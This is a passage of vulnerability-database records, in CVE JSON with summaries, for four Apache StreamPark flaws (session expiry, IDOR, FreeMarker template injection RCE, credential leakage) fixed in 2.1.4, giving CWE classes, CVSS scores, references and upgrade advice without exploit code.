"status": "affected",
"version": "1.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L0ne1y"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "On versions before 2.1.4,\u0026nbsp;session is not invalidated after logout. When the user logged in successfully, the Backend service returns \"Authorization\" as the front-end authentication credential. \"Authorization\" can still initiate requests and access data even after logout.\u003cbr\u003e\u003cbr\u003e\u003cdiv\u003eMitigation:\u003cbr\u003e\u003cbr\u003e\u003c/div\u003eall users \u003cspan style=\"background-color: var(--wht);\"\u003eshould upgrade to 2.1.4\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"
}
],
"value": "On versions before 2.1.4,\u00a0session is not invalidated after logout. When the user logged in successfully, the Backend service returns \"Authorization\" as the front-end authentication credential. \"Authorization\" can still initiate requests and access data even after logout.\n\nMitigation:\n\nall users should upgrade to 2.1.4\n\n"
}
],
"metrics": [
{
"other": {
"content": {
"text": "moderate"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-613",
"description": "CWE-613 Insufficient Session Expiration",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-23T08:13:41.408Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/zslblrz1l0n9t67mqdv42yv75ncfn9zl"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: session not invalidated after logout",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2024-29070",
"datePublished": "2024-07-23T08:13:41.408Z",
"dateReserved": "2024-03-15T03:21:44.446Z",
"dateUpdated": "2024-09-13T17:04:30.274Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-34457 (GCVE-0-2024-34457)
Vulnerability from nvd – Published: 2024-07-22 09:48 – Updated: 2024-11-04 21:27
VLAI?
Title
Apache StreamPark IDOR Vulnerability
Summary
On versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone's user flink information, including executeSQL and config.
Mitigation:
all users should upgrade to 2.1.4
Severity ?
No CVSS data available.
CWE
- CWE-639 - Authorization Bypass Through User-Controlled Key
Assigner
References
| URL | Tags | |
|---|---|---|
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
1.0.0 , < 2.1.4
(semver)
|
Credits
L0ne1y
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-34457",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-22T17:57:18.100067Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T21:27:42.331Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T02:51:11.536Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/brlfrmvw9dcv38zoofmhxg7qookmwn7j"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/22/2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "1.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L0ne1y"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003eOn versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone\u0027s user flink information, including executeSQL and config.\u003cbr\u003e\u003c/div\u003e\u003cbr\u003e\u003cdiv\u003eMitigation:\u003cbr\u003e\u003cbr\u003e\u003c/div\u003eall users \u003cspan style=\"background-color: var(--wht);\"\u003eshould upgrade to 2.1.4\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"
}
],
"value": "On versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone\u0027s user flink information, including executeSQL and config.\n\nMitigation:\n\nall users should upgrade to 2.1.4"
}
],
"metrics": [
{
"other": {
"content": {
"text": "moderate"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639 Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T11:03:07.865Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/brlfrmvw9dcv38zoofmhxg7qookmwn7j"
},
{
"url": "https://www.openwall.com/lists/oss-security/2024/07/22/2"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark IDOR Vulnerability",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2024-34457",
"datePublished": "2024-07-22T09:48:23.130Z",
"dateReserved": "2024-05-04T01:42:52.214Z",
"dateUpdated": "2024-11-04T21:27:42.331Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-29178 (GCVE-0-2024-29178)
Vulnerability from nvd – Published: 2024-07-18 11:15 – Updated: 2025-02-13 17:47
VLAI?
Title
Apache StreamPark: FreeMarker SSTI RCE Vulnerability
Summary
On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server, The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability.
Mitigation:
all users should upgrade to 2.1.4
Severity ?
No CVSS data available.
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
1.0.0 , < 2.1.4
(semver)
|
Credits
L0ne1y
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:apache:streampark:1.0.0:-:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "streampark",
"vendor": "apache",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "1.0.0",
"versionType": "semver"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-29178",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-18T13:21:44.462964Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-18T13:37:53.581Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T01:10:54.085Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/18/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "1.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L0ne1y"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eOn versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server,\u0026nbsp;The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability.\u003cbr\u003e\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\u003cdiv\u003eMitigation:\u003cbr\u003e\u003cbr\u003e\u003c/div\u003eall users \u003cspan style=\"background-color: var(--wht);\"\u003eshould upgrade to 2.1.4\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e"
}
],
"value": "On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server,\u00a0The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability.\n\nMitigation:\n\nall users should upgrade to 2.1.4"
}
],
"metrics": [
{
"other": {
"content": {
"text": "moderate"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94 Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-18T11:20:07.243Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/07/18/1"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: FreeMarker SSTI RCE Vulnerability",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2024-29178",
"datePublished": "2024-07-18T11:15:56.706Z",
"dateReserved": "2024-03-18T16:34:46.011Z",
"dateUpdated": "2025-02-13T17:47:39.338Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-29120 (GCVE-0-2024-29120)
Vulnerability from nvd – Published: 2024-07-17 14:59 – Updated: 2025-02-13 17:47
VLAI?
Title
Apache StreamPark: Information leakage vulnerability
Summary
In Streampark (version < 2.1.4), when a user logged in successfully, the Backend service would return "Authorization" as the front-end authentication credential. User can use this credential to request other users' information, including the administrator's username, password, salt value, etc.
Mitigation:
all users should upgrade to 2.1.4
Severity ?
No CVSS data available.
CWE
- CWE-212 - Improper Removal of Sensitive Information Before Storage or Transfer
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.0.0 , < 2.1.4
(semver)
|
Credits
L0ne1y
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-29120",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-17T18:16:06.842752Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-922",
"description": "CWE-922 Insecure Storage of Sensitive Information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-14T16:46:42.096Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T01:03:51.794Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/4"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L0ne1y"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "In Streampark (version \u0026lt; \u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e2.1.4\u003c/span\u003e), when a user logged in successfully, the Backend service would return \"Authorization\" as the front-end authentication credential. User can use this credential to request other users\u0027 information, including the administrator\u0027s username, password, salt value, etc.\u0026nbsp;\u003cbr\u003e\u003cbr\u003e\u003cdiv\u003eMitigation:\u003cbr\u003e\u003cbr\u003e\u003c/div\u003eall users \u003cspan style=\"background-color: var(--wht);\"\u003eshould upgrade to 2.1.4\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e"
}
],
"value": "In Streampark (version \u003c 2.1.4), when a user logged in successfully, the Backend service would return \"Authorization\" as the front-end authentication credential. User can use this credential to request other users\u0027 information, including the administrator\u0027s username, password, salt value, etc.\u00a0\n\nMitigation:\n\nall users should upgrade to 2.1.4"
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-212",
"description": "CWE-212 Improper Removal of Sensitive Information Before Storage or Transfer",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-17T15:00:09.103Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/4"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: Information leakage vulnerability",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2024-29120",
"datePublished": "2024-07-17T14:59:04.540Z",
"dateReserved": "2024-03-16T00:04:05.820Z",
"dateUpdated": "2025-02-13T17:47:37.551Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}